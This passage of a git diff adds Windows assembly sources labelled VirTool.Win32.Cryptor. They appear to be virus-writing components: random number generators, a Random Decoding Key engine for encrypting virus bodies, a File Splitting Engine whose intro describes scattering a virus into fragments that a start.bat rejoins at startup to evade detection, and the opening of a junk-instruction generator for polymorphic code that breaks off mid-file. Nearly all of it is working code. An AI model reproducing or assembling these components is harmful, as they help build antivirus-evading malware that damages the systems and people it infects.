+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                       :)!                                                              ;
+;                                                                                                        ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                   функция RANG32                                                       ;
+;                             ГЕНЕРАТОР СЛУЧАЙНЫХ ЧИСЕЛ (ГСЧ)                                            ;
+;                                                                                                        ;
+;                                                                                                        ;
+;ВХОД:                                                                                                   ;
+;1 параметр - число (N). Будет произведен поиск случайного числа в диапазоне [0..N-1]                    ;
+;--------------------------------------------------------------------------------------------------------;
+;ВЫХОД:                                                                                                  ;
+;EAX - слуяайное число в диапазоне [0..N-1]                                                              ;
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;         
+;                                                                                                        ;
+;                                       y0p!                                                             ;
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                                                                                                        ;
+;                                       ФИЧИ                                                             ;
+;                                                                                                        ;
+;(+) базонезависимость                                                                                   ;
+;(+) прост в использовании                                                                               ;
+;(+) не использует WinApi'шек                                                                            ;
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+;                                                                                                        ;
+;                                   ИСПОЛЬЗОВАНИЕ:                                                       ;
+;                                                                                                        ;
+;1) Подключение:                                                                                         ;
+;       rang32.asm                                                                                       ;
+;2) Вызов (пример stdcall):                                                                              ;
+;       push 5                  ;кладем в стэк число                                                     ;
+;       call RANG32             ;вызываем ГСЧ -> в EAX после вызова будет значение [0..5-1]              ;
+;                                                                                                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+                                                                                                       
+
+
+
+                                                    ;m1x
+                                                ;pr0mix@mail.ru
+                                            ;EOF 
+                                                                                                                                                                                          
+                                                                                   
+
+                                                                                                                                                                                                          
+RANG32:                                                                            
+    pushad                                      ;сохраняем регистры                                                                     
+    mov     ecx,dword ptr [esp+24h]             ;ecx=число, что передали в стэке
+    db      0fh,31h                                      
+    imul    eax,eax,1664525                     ;идут разные вычисления для получения                                                   
+    add     eax,1013904223                      ;более случайного числа 
+    add     eax,edx
+    adc     eax,esp 
+    rcr     eax,16                                  
+    imul    eax,[esp+32] 
+    xor     edx,edx     
+    mul     ecx                                 ;mul действует как div 
+    mov     dword ptr [esp+1ch],edx                                            
+    popad                                                                      
+    ret     04
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец функции RANG32                                                                                          
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+
diff --git a/libs/VirTool.Win32.Cryptor.Rdk.inc b/libs/VirTool.Win32.Cryptor.Rdk.inc
new file mode 100644
index 00000000..0d596d03
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Rdk.inc
@@ -0,0 +1,240 @@
+comment *
+                      ЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬ  ЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬ
+                     ЯЯЯЫЫЫЫЫЫ ЬЬ ЯЯЯ  ЯЯЯ ЬЬЬ ЫЫЫЫЫЫЯЯЯ
+                         ±ЫЫЫЫ ЫЫЫЫЫЫ   ЫЫЫЫЫЫ ЫЫЫЫ°
+                          ЫЫЫЫ ЫЫЫЫЫЫ  ІЫЫЫЫЫ  ЫЫЫЫ
+                          ЫЫЫЫ ЯЫЫЫЫ± ЬЫЫЫЫІ   ЫЫЫЫ
+                         °ЫЫЫЫ  ЫЫЫЫЫЯЫЫЫЫЯ    ЫЫЫЫ
+                         ±ЫЫЫЫ  ЫЫЫЫІ  ЫЫЬЬ    ЫЫЫЫ°
+           ЬЬЬЬЬЬЬЬЬЬЬЬЬ ІЫЫЫЫ  ЫЫЫЫ±  ЫЫЫЫІЬ  ЫЫЫЫ± ЬЬЬЬЬЬЬЬЬЬЬЬ
+          Ы              ЫЫЫЫЫ  ЫЫЫЫІ  ІЫЫЫЫЫ° ЫЫЫЫІ             Ы
+          Ы              ЫЫЫЫЫ ЬЫЫЫЫЫ   ІЫЫЫЫІ ЫЫЫЫЫ             Ы
+          ЯЬ             ЯЯЯЯЯ ЯЯЯЯ       ЯЯЯЯ ЯЯЯЯЯ            ЬЯ
+           ЬЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯюThe Knight TemplarsюЯЯЯЯЯЯЯЯЯЯЯЯЯЯЯЬ
+           Ы                                                    Ы
+           Ы  Random Decoding Key Engine 32-bit v 1.0 [RDKE32]  Ы
+           Ы                       Code by                      Ы
+           Ы                     Darkman/TKT                    Ы
+           Ы                                                    Ы
+            ЯЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЬЯ
+
+
+  Do not use this engine to encrypt known plaintext such as the actual virus
+  code. It is possible to decrypt known plaintext encrypted with this
+  engine using the X-RAY technique, also known as cryptanalysis. You can read
+  more about this technique in "Detecting oh, roughly every polymorphic engine
+  out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
+  4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
+  ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
+  eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
+  blocks.
+
+  Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
+*
+
+hash_size               equ     (0a0h/08h)
+
+_RDKE32Encrypt  struc
+        _lpHash                                 dd      ?
+        _lpBuffer                               dd      ?
+        _dwNumberOfBytesToHashAndEncrypt        dd      ?
+        _dwSecurityLevel                        dd      ?
+                ends
+
+_RDKE32Decrypt  struc
+        _lpHash                         dd      ?
+        _lpBuffer                       dd      ?
+        _dwNumberOfBytesToDecrypt       dd      ?
+                ends
+
+_pushad struc
+        _edi    dd      ?
+        _esi    dd      ?
+        _ebp    dd      ?
+        _esp    dd      ?
+        _ebx    dd      ?
+        _edx    dd      ?
+        _ecx    dd      ?
+        _eax    dd      ?
+        ends
+
+rdke32_begin:
+; RDKE32Encrypt
+;
+;
+; The RDKE32Encrypt function creates a hash and encrypts data.
+;
+;   VOID RDKE32Encrypt(
+;     LPVOID lpHash  // data buffer to receive hash
+;     LPVOID lpBuffer  // data buffer of data to hash and encrypt
+;     DWORD dwNumberOfBytesToHashAndEncrypt  // number of bytes to hash and
+;                                            // encrypt
+;     DWORD dwSecurityLevel  // security level
+;   );
+;
+; Parameters
+; lpHash
+;   [out] Pointer to the buffer that receives the hash.
+; lpBuffer
+;   [out] Pointer to the buffer containing the data to be hashed and encrypted.
+; dwNumberOfBytesToHashAndEncrypt
+;   [in] Specifies the number of bytes to be hashed and encrypted.
+; dwSecurityLevel
+;   [in] Specifies the security level of the encryption. The higher it is the
+;   longer it will take for RDKE32Decrypt to bruteforce and decrypt the
+;   encrypted data.
+;
+; Return Values
+; This function does not return a value.
+
+RDKE32Encrypt   proc                    ; Random Decoding Key Engine 32-bit
+                                        ; v 1.00 [RDKE32] encryptor
+        pushad
+        mov     edi,[esp._lpHash+size _pushad+04h]
+                                        ; Pointer to the buffer that receives
+                                        ; the hash
+        mov     ebx,[esp._lpBuffer+size _pushad+04h]
+                                        ; Pointer to the buffer containing the
+                                        ; data to be hashed and encrypted
+        mov     ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
+                                        ; Specifies the number of bytes to be
+                                        ; hashed and encrypted
+        mov     eax,[esp._dwSecurityLevel+size _pushad+04h]
+                                        ; Specifies the security level
+
+        call    SHA1, edi, ecx, ebx
+insecure_key:
+        call    GetRandomNumberWithinRange
+        call    test_key_security
+        jz      insecure_key
+
+        call    cryptor
+        popad
+
+        ret     size _RDKE32Encrypt
+                endp
+
+; RDKE32Decrypt
+;
+;
+; The RDKE32Decrypt function creates a hash and encrypts data.
+;
+;   VOID RDKE32Decrypt(
+;     LPVOID lpHash  // data buffer of hash
+;     LPVOID lpBuffer  // data buffer of data to decrypt
+;     DWORD dwNumberOfBytesToDecrypt  // number of bytes to decrypt
+;   );
+;
+; Parameters
+; lpHash
+;   [in] Pointer to the buffer containing the hash.
+; lpBuffer
+;   [out] Pointer to the buffer containing the data to decrypted.
+; dwNumberOfBytesToDecrypt
+;   [in] Specifies the number of bytes to be decrypted.
+;
+; Return Values
+; This function does not return a value.
+
+RDKE32Decrypt   proc                    ; Random Decoding Key Engine 32-bit
+                                        ; v 1.00 [RDKE32] decryptor
+        pushad
+        mov     edi,[esp._lpHash+size _pushad+04h]
+                                        ; Pointer to the buffer of the hash
+        mov     ebx,[esp._lpBuffer+size _pushad+04h]
+                                        ; Pointer to the buffer containing the
+                                        ; data to be decrypted
+        mov     ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
+                                        ; Specifies the number of bytes to be
+                                        ; decrypted
+        sub     esp,hash_size
+
+        mov     esi,esp                 ; ESI = pointer to the hash
+        xor     edx,edx
+bruteforce_loop:
+        inc     edx                     ; EDX = 32-bit encryption/decryption
+                                        ; key
+        call    test_key_security
+        jz      bruteforce_loop
+
+        call    cryptor
+
+        call    SHA1, esi, ecx, ebx
+
+        pushad
+        push    (hash_size/04h)
+        pop     ecx
+        rep     cmpsd                   ; Succesfully decrypted the buffer to
+                                        ; be decrypted?
+        popad
+        je      RDKE32Decrypt_exit
+
+        call    cryptor
+
+        jmp     bruteforce_loop
+RDKE32Decrypt_exit:
+        add     esp,hash_size
+        popad
+
+        ret     size _RDKE32Decrypt
+                endp
+
+test_key_security       proc            ; Test the security of the 32-bit key
+        pushad
+
+        test    eax,eax                 ; Insecure key?
+        jz      test_key_exit
+
+        push    03h
+        pop     ecx
+test_key_loop:
+        mov     eax,edx                 ; EDX = 32-bit encryption/decryption
+                                        ; key
+        mov     ebx,ecx
+_test_key_loop:
+        rol     eax,08h
+
+        test    al,dl
+        jz      test_next_key
+
+        cmp     al,dl                   ; Insecure key?
+        je      test_key_exit
+test_next_key:
+        dec     ebx
+        jnz     _test_key_loop
+
+        rol     edx,08h
+
+        loop    test_key_loop
+
+        inc     ecx                     ; Secure key
+test_key_exit:
+        popad
+
+        ret
+                        endp
+
+cryptor proc                            ; 32-bit encryptor/decryptor
+        pushad
+crypt_loop:
+        inc     ecx
+
+        test    dl,dl                   ; Insecure key?
+        jz      dont_crypt
+
+        dec     ecx
+
+        xor     [ebx],dl
+        inc     ebx
+dont_crypt:
+        rol     edx,08h
+
+        loop    crypt_loop
+        popad
+
+        ret
+        endp
+
+                db      ' [RDKE32] '
+rdke32_end:
+rdke32_size     equ     (rdke32_end-rdke32_begin)
diff --git a/libs/VirTool.Win32.Cryptor.Rgen32.asm b/libs/VirTool.Win32.Cryptor.Rgen32.asm
new file mode 100644
index 00000000..a82c69b5
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Rgen32.asm
@@ -0,0 +1,96 @@
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; ГЕНЕРАТОР СЛУЧАЙНОГО ЧИСЛА V. 0.42 (x) 2005 СЛОН                             ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; Интервал:		[0..eax-1]                                             ;
+;------------------------------------------------------------------------------;
+; Используется алгоритм ГПСЧ Джорджа Марсаглии - "Xorshift - 128"              ;
+; Данный алгоритм прошел тест DIEHARD его период 2^128-1                       ;
+;------------------------------------------------------------------------------;
+; Использование:        call	r_init                                         ;
+;			mov	eax,ГРАНИЦА ИНТЕРВАЛА                          ;
+;			call	brandom32                                      ;
+;------------------------------------------------------------------------------;
+; Результат:		число в интервале [0..ГРАНИЦА ИНТЕРВАЛА]               ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+
+;----[Подпрограмма инициализации генератора случайных чисел]-------------------;
+
+r_init:
+		push	ebp eax edx		; Сохраняем в стэке ebp,eax,edx
+
+		call	__delta1_		;
+__delta1_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta1_	;
+
+		db	0fh,031h		; Получаем случайное зерно
+		mov	[ebp+x],eax		;
+
+		pop	edx eax ebp		; Восстанавливаем edx,eax,ebp
+
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма генерации случаного чмсла в диапазоне]----------------------;
+
+brandom32:					; Эта подпрограмма
+						; возвращает случайное число
+						; в диапазоне 0..eax-1
+
+		push	edx ecx	ebp		; Сохраняем в стэке edx,ecx,ebp
+
+		call	__delta2_		;
+__delta2_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta2_	;
+
+		imul	eax,eax,100		; Умножаем eax на 100
+		push	eax			; и сохраняем eax в стэке
+
+		call	random32		; Вызываем подпрограмму
+						; генерации случайного числа
+		xor	edx,edx			; Обнуляем edx
+		pop	ecx			; Восстанавливаем значение
+						; из стэка в ecx
+		div	ecx			; Делим eax на ecx
+		xchg	eax,edx			; Помещаем остаток в eax
+		xor	edx,edx			; Обнуляем edx
+		push	100			; Помещаем в ecx - 100
+		pop	ecx			;
+		div	ecx			; Делим eax на ecx
+		pop	ebp ecx edx		; Восстанавливаем ebp,ecx,edx,
+		ret				; Возврат из подпрограммы
+
+;----[Подпрограмма генерации случайного числа]---------------------------------;
+
+random32:
+		push	ebx edx ecx		;
+		push	ebp			; Сохраняем регистры в стэке
+
+		call	__delta3_		;
+__delta3_:	pop	ebp			; Получение дельта смещения
+		sub	ebp,offset __delta3_	;
+
+                mov     eax,12345678		;
+		x = dword ptr $-4		;
+		shl	eax,0bh			; Выполняем математические
+		xor	eax,[ebp+x]		; преобразования по нужному нам
+                mov     edx,362436069		; алгоритму данная часть
+		y = dword ptr $-4		; выглядела бы на С так:
+		mov	[ebp+x],edx		; unsigned long x=123456789,
+                mov     ecx,521288629		; y=362436069,
+		z = dword ptr $-4		; z=521288629,
+		mov	[ebp+y],ecx		; w=88675123;
+                mov     ebx,88675123		; t=(x^(x<<11));x=y;y=z;z=w;
+		w = dword ptr $-4		; Где t в нашем случае eax
+		mov	[ebp+z],ebx		;
+		mov	edx,[ebp+w]		; Далее идут следующие
+		shr	edx,13h			; вычисления, которые дают СЧ
+		xor	edx,[ebp+w]		; (w=(w^(w>>19))^(t^(t>>8)));
+		xor	edx,eax			;
+		shr	eax,08h			;
+		xor	edx,eax			;
+		mov	[ebp+w],edx		;
+		mov	eax,edx			;
+
+		pop	ebp			;
+		pop	ecx edx ebx		; Вынимаем регистры из стэка
+
+		retn				; Возврат из подпрограммы
diff --git a/libs/VirTool.Win32.Cryptor.SetG.7z b/libs/VirTool.Win32.Cryptor.SetG.7z
new file mode 100644
index 00000000..38f4d636
Binary files /dev/null and b/libs/VirTool.Win32.Cryptor.SetG.7z differ
diff --git a/libs/VirTool.Win32.Cryptor.Split.asm b/libs/VirTool.Win32.Cryptor.Split.asm
new file mode 100644
index 00000000..42e06c75
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Split.asm
@@ -0,0 +1,302 @@
+  File Splitting Engine
+  by Second Part To Hell
+  www.spth.de.vu
+  spth@priest.com
+  written in May-June 2005
+  in Austria
+
+  This is just a small engine, but I'm sure it could be very useful.
+  What does the engine do? It splitts the current file into 3-10 byte
+  parts and creates a joining file (called start.bat).
+
+  To understand it's purpose, you should read my article called
+  "Over-File Splitting".
+
+  What could you do with the splitted files?
+  - You could make an archive (via own routing, possible installed WinZIP/RAR
+    or use the WinME+ preinstalled function [C:\WINDOWS\System32\zipfldr.dll,-10195]
+    to compress files.) This file now could be send out via eMail.
+    The advantage: No file is infected with an virus - but all together they are.
+
+  - You could save all files in a directory (Windir, system32, whatever), and
+    call the joining file every startup. What may happen? Virus/Worm works at
+    the computer, but no file is infected :)
+
+  - You could think of your own way to use this technique. Lazy ass :)
+
+
+  How to compile:
+  - Delete this intro
+  - Use flat assembler 1.56
+
+  Now: Much fun with it :)
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; [File Splitting Engine] ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+include '..\FASM\INCLUDE\win32ax.inc'
+
+.data
+	c_file_name	dd 0x0
+	c_file_rnd_name: times 8 db 0x0
+				 db '.tmp',0
+	c_file_handle	dd 0x0
+	c_file_size	dd 0x0
+	c_map_handle	dd 0x0
+	c_map_pointer	dd 0x0
+
+	compain_name	db 'start.bat',0
+	compain_data	dd 0x0
+	compain_pointer dd 0x0
+	compain_start	db 'copy '
+	compain_handle	dd 0x0
+
+	split_handle	dd 0x0
+	split_counter	db 0x0
+
+	rand_name_buffer: times 8 db 0x0
+	rnd_file_name: times 8 db 0x0
+			       db '.tmp',0
+	ZERO_field	dd 0x0
+
+systemtime_struct:	       ; for random number
+	  dw 0		       ; wYear
+	  dw 0		       ; wMonth
+	  dw 0		       ; wDayOfWeek
+	  dw 0		       ; wDay
+	  dw 0		       ; wHour
+	  dw 0		       ; wMinute
+	  dw 0		       ; wSecond
+rnd:	  dw 0		       ; wMilliseconds
+
+.code
+   start:
+	invoke	GetCommandLine
+	inc	eax			; Delete first "
+
+	mov	ebx, eax		; Save eax
+
+    get_my_name:
+	inc	ebx			; Get next letter
+	cmp	byte [ebx], '.' 	; Compare with '.'
+    jne get_my_name
+
+	mov	byte [ebx+4], 0x0	; Delete the second "
+	mov	[c_file_name], eax	; Save the pointer
+
+	invoke	DeleteFile, compain_name	; Delete the old compainer-file the file
+
+	mov	ebp, 0xAAAAAAAA 		; Influences the random engine
+	call	random_name			; random name in rnd_file_name
+
+	mov	esi, rnd_file_name		; From: random-name buffer
+	mov	edi, c_file_rnd_name		; To: Buffer for this copy of the file
+	mov	ecx, 8				; How much: 8 letters
+	rep	movsb				; Copy string
+
+	invoke	CopyFile, [c_file_name], c_file_rnd_name, FALSE     ; Copies the current file to a .tmp
+
+	invoke	CreateFile, c_file_rnd_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0x0 	   ; Open own file
+	mov	[c_file_handle], eax							  ; Save the file handle
+
+	invoke	GetFileSize, [c_file_handle], c_file_size				  ; Get the size of the file
+	mov	[c_file_size], eax							  ; Low Filesize returned in eax
+
+	invoke	CreateFileMapping, [c_file_handle], 0x0, PAGE_READWRITE, 0x0, [c_file_size], 0x0    ; Create a Map
+	mov	[c_map_handle], eax								    ; Save the Map handle
+
+	invoke	MapViewOfFile, [c_map_handle], FILE_MAP_WRITE, 0x0, 0x0, [c_file_size]		  ; Map view of file
+	mov	[c_map_pointer], eax								  ; Save the pointer of file
+
+	invoke	VirtualAlloc, 0x0, 0x120000, 0x1000, 0x4	; Reserve Space in Memory
+	mov	[compain_data], eax				; Save the pointer to it.
+	mov	[compain_pointer], eax				; Save again
+
+	mov	esi, compain_start				; What to write
+	mov	edi, [compain_pointer]				; Where to write
+	mov	ecx, 5						; How much to write
+	rep	movsb						; Write!
+
+	add	[compain_pointer], 5				; Get next empty byte to write
+
+    main_loop:
+	mov	ebp, 0xAAAAAAAA 		; Influences the random engine
+	call	random_name			; random name in rnd_file_name
+
+	invoke	CreateFile, rnd_file_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
+	cmp	eax, INVALID_HANDLE_VALUE		; If file already existed
+	je	main_loop				; then get a new file-name
+
+	mov	[split_handle], eax			; Save the file-handle
+
+	call	random_number				; Get random number
+	xor	eax, eax				; eax=0
+	mov	al, [rand_name_buffer]			; al~=random
+	and	al, 7					; al= 0000 0???
+	add	al, 3					; At least three byte
+	mov	[split_counter], al			; Save that bytes
+
+	sub	[c_file_size], eax			; Decrease the bytes to write
+
+	invoke	WriteFile, [split_handle], [c_map_pointer], eax, ZERO_field, 0x0       ; Write (1..8) byte
+	invoke	CloseHandle, [split_handle]		; Close the file
+
+	xor	eax, eax
+	mov	al, [split_counter]			; How many bytes written
+	add	[c_map_pointer], eax			; Add the pointer - write the next few bytes next time
+
+	mov	esi, rnd_file_name			; From: Filename-buffer
+	mov	edi, [compain_pointer]			; To: compainer-pointer
+	mov	ecx, 12 				; 8+strlen('.tmp')
+	rep	movsb					; Write!
+
+	add	[compain_pointer], 12			; Add 12 to pointer
+
+	mov	eax, [compain_pointer]			; Pointer to eax
+
+	mov	byte [eax], '+' 			; Move '+' to the code's memory
+	inc	[compain_pointer]			; Increase the pointer
+
+	cmp	[c_file_size], 0			; Compare if more bytes to write
+    jg	main_loop					; If yes, jmp to main_loop
+
+	invoke	UnmapViewOfFile, [c_map_pointer]	; Unmap View of File
+	invoke	CloseHandle, [c_map_handle]		; Close Map
+	invoke	CloseHandle, [c_file_handle]		; Close File
+
+	invoke	DeleteFile, c_file_rnd_name		; Delete the temporary copy of the current file
+
+	invoke	CreateFile, compain_name, GENERIC_READ or GENERIC_WRITE, 0x0, 0x0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0x0
+	mov	[compain_handle], eax
+
+
+	mov	eax, [compain_pointer]		; eax=pointer
+	dec	eax				; Delete the last '+'
+	mov	byte [eax], 0x20		; Add a space
+	inc	[compain_pointer]		; Increase pointer again
+
+	mov	ebp, 0xAAAAAAAA 		; Influences the random engine
+	call	random_name			; random name in rnd_file_name
+
+	mov	eax, rnd_file_name		; RND-pointer in eax
+	add	eax, 8				; add 8 to pointer (='.' of filename)
+	mov	dword [eax], '.exe'		; instate of '.tmp', '.exe'
+
+	dec	[compain_pointer]
+	mov	esi, rnd_file_name		; From: rnd_file_name
+	mov	edi, [compain_pointer]		; To: compainter_pointer
+	mov	ecx, 12 			; How much: 12 bytes
+	rep	movsb				; Write
+
+	add	[compain_pointer], 12		; Add 12, to get the end again
+	mov	eax, [compain_pointer]		; eax=pointer to content
+	mov	word [eax], 0x0A0D		; Next Line
+	add	[compain_pointer], 2
+
+	mov	esi, rnd_file_name		; From: rnd_file_name
+	mov	edi, [compain_pointer]		; To: compainter_pointer
+	mov	ecx, 12 			; How much: 12 bytes
+	rep	movsb				; Write
+
+	add	[compain_pointer], 12		; Add 12, to get the end again
+
+
+	mov	eax, [compain_data]
+	sub	[compain_pointer], eax
+
+	invoke	WriteFile, [compain_handle], [compain_data], [compain_pointer], ZERO_field, 0x0       ; Write the file
+
+	invoke	CloseHandle, [compain_handle]
+
+	invoke	ExitProcess, 0x0
+
+random_number:
+	pop	edi				; Get value of stack
+	push	edi				; Back to the stack
+	mov	ecx, 8				; ecx=counter
+	mov	dh, 0xAA			; dh: changes in the function and makes the number little bit more random
+	mov	dl, 0x87			; same as dh
+   random_name_loop:
+	push	dx				; Save dx at stack
+	push	ecx				; Save counter at stack
+	call	random_byte			; Random number in al
+	pop	ecx				; get counter
+	xor	al, cl				; Counter influences pseudo random number
+	pop	dx				; Get dx
+	push	ecx
+	xor	dx, cx				; Counter influences influncing number
+	add	dh, al				; Random number influences influencing number
+	sub	dl, al				; Same as dh
+	neg	dl				; Neg dl
+	xor	dl, dh				; dl XOR dh -> more variability
+	xor	al, dl				; random number changes
+	sub	ax, di				; value of stack influences random number
+	add	ax, dx				; ax+dx
+	mov	dl, [rand_name_buffer+ecx-2]
+	mov	dh, [rand_name_buffer+ecx-3]	; dx=???? ???? ????? ?????
+	sub	al, dl				; al-=dl
+	add	al, dh				; al+=dh
+	mov	ah, dl				; ah=dl
+	push	ax				; AX to stack
+	mov	cl, 1				; cl=1
+	or	dh, cl				; dh is at least 1 (to reduce chance of result=zero)
+	mul	dh				; AL=AX*DH
+	pop	cx				; CX=old AX
+	push	cx				; To stack again
+	add	cl, al				; CL+=AL
+	sub	cl, ah				; CL-=AH
+	xchg	al, cl				; AL=CL
+	mov	cx, bp				; cx=bp
+	mul	cl				; AX=AL*CL
+	neg	ah				; NEG AH
+	xor	al, ah				; xor AL and AH
+	pop	cx				; get old AX
+	sub	cl, al				; SUB
+	add	cl, dl				; cl+=old random number
+	sub	al, cl				; al ~=random :)
+	pop	ecx				; Get counter
+	mov	[rand_name_buffer+ecx-1], al	; Save random letter
+   loop random_name_loop
+ret
+
+
+
+random_name:
+	call	random_number			; Get 8 random bytes
+	mov	ecx, 8				; counter=8, as we want to do it 8 times
+
+   changetoletter:
+	mov	al, [rand_name_buffer+ecx-1]	; Get a letter
+	mov	bl, 10				; BL=10
+	xor	ah, ah				; AX: 0000 0000 ???? ????
+	div	bl				; AL=rnd/10=number between 0 and 25
+	add	al, 97				; Add 97 for getting lowercase letters
+	mov	[rnd_file_name+ecx-1], al	; Save random letter
+   loop changetoletter
+ret
+
+random_byte:
+	invoke	GetSystemTime, systemtime_struct	; Get first number
+	mov	ebx, [rnd-2]				; ebx=number
+	add	ebx, edx				; Making it pseudo-independent of time
+	sub	ebx, ecx
+	xor	ebx, eax
+	xchg	bl, bh
+	pop	ecx
+	push	ecx
+	neg	ebx
+	xor	ebx, ecx				; ebx=pseudo-indepentend number
+
+	invoke	GetTickCount				; Get second number
+	xor	eax, ecx				; eax=number
+	neg	ax					; Making it pseudo-independent of time
+	xor	eax, edx
+	xor	ah, al
+	sub	eax, ebp
+	add	eax, esi				; eax=pseudo-indepentend number
+
+	xor	eax, ebx				; Compain the numbers -> eax
+	mov	ebx, eax				; Save eax
+	shr	eax, 8					; e-part -> ax
+	xor	ax, bx
+	xor	al, ah					; al=number
+ret
+.end start
\ No newline at end of file
diff --git a/libs/VirTool.Win32.Cryptor.Wig.asm b/libs/VirTool.Win32.Cryptor.Wig.asm
new file mode 100644
index 00000000..60482007
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Wig.asm
@@ -0,0 +1,1175 @@
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; ГЕНЕРАТОР МУСОРНЫХ ИНСТРУКЦИЙ V. 0.4 (x) 2004 СЛОН http://slon.wronger.com   ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; Использование:        mov	edi,БУФЕР ДЛЯ КОДА                             ;
+;			mov	ecx,ДЛИНА КОДА                                 ;
+;			mov	ebx,НЕ ИСПОЛЬЗУЕМЫЕ РЕГИСТРЫ(_all)             ;
+;			call	garbage                                        ;
+;------------------------------------------------------------------------------;
+; Результат:		сгенерированный код в edi                              ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+; ВЕРСИЯ 0.3		Генерация инструкций по заданным статистическим        ;
+;			характерстикиам(они получены в результате анализа      ;
+;			большого количества файлов формата "PE")               ;
+;------------------------------------------------------------------------------;
+; ВЕРСИЯ 0.2		Добавлены новые инструкции x86, так же добавлены       ;
+;			инструкции сопроцессора (x87)                          ;
+;------------------------------------------------------------------------------;
+; ВЕРСИЯ 0.1		Реализация многих инструкций x86 процессора,           ;
+;			случайная комбинация инструкций                        ;
+;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%;
+
+;----[Главная подпрограмма генератора мусора]----------------------------------;
+
+garbage:					; Подпрограмма генерации
+						; мусорных инструкций
+		push	edx			; Сохраняем в стэке
+		push	ecx			; edx, ecx, esi, ebp, ecx, eax
+		push	esi			; 
+		push	ebp			;
+		push	ebx			;
+		push	eax			;
+
+		call	delta_offset		; 
+delta_offset:	pop	ebp			; Получаем дельта смещение
+		sub	ebp,offset delta_offset	;
+
+		call	r_init			; Инициалицируем ГСЧ
+__st__:
+		test	ecx,ecx			; Если все инструкции
+		jz	landing			; сгенерированы, то на выход
+
+		mov	eax,21			; Выбираем случайным образом
+		call	brandom32		; вариант генерации мусорных
+						; инструкций
+		shl	eax,1			; Умножаем eax на 2
+
+		call	__freq__		; Выбираем блок инструкций по
+						; статистической вероятности
+		test	eax,eax			; Если не выбрали, то пытаемся
+		jz	__st__			; снова
+
+		lea	esi,[ebp+mega_table]	; В esi смещение на таблицу
+						; относительных смещений
+		add	esi,eax			; к esi добавляем eax
+		xor	eax,eax			; Обнуляем eax
+		lodsw				; В ax загружаем 
+						; относительное смещение от
+						; метки __st__
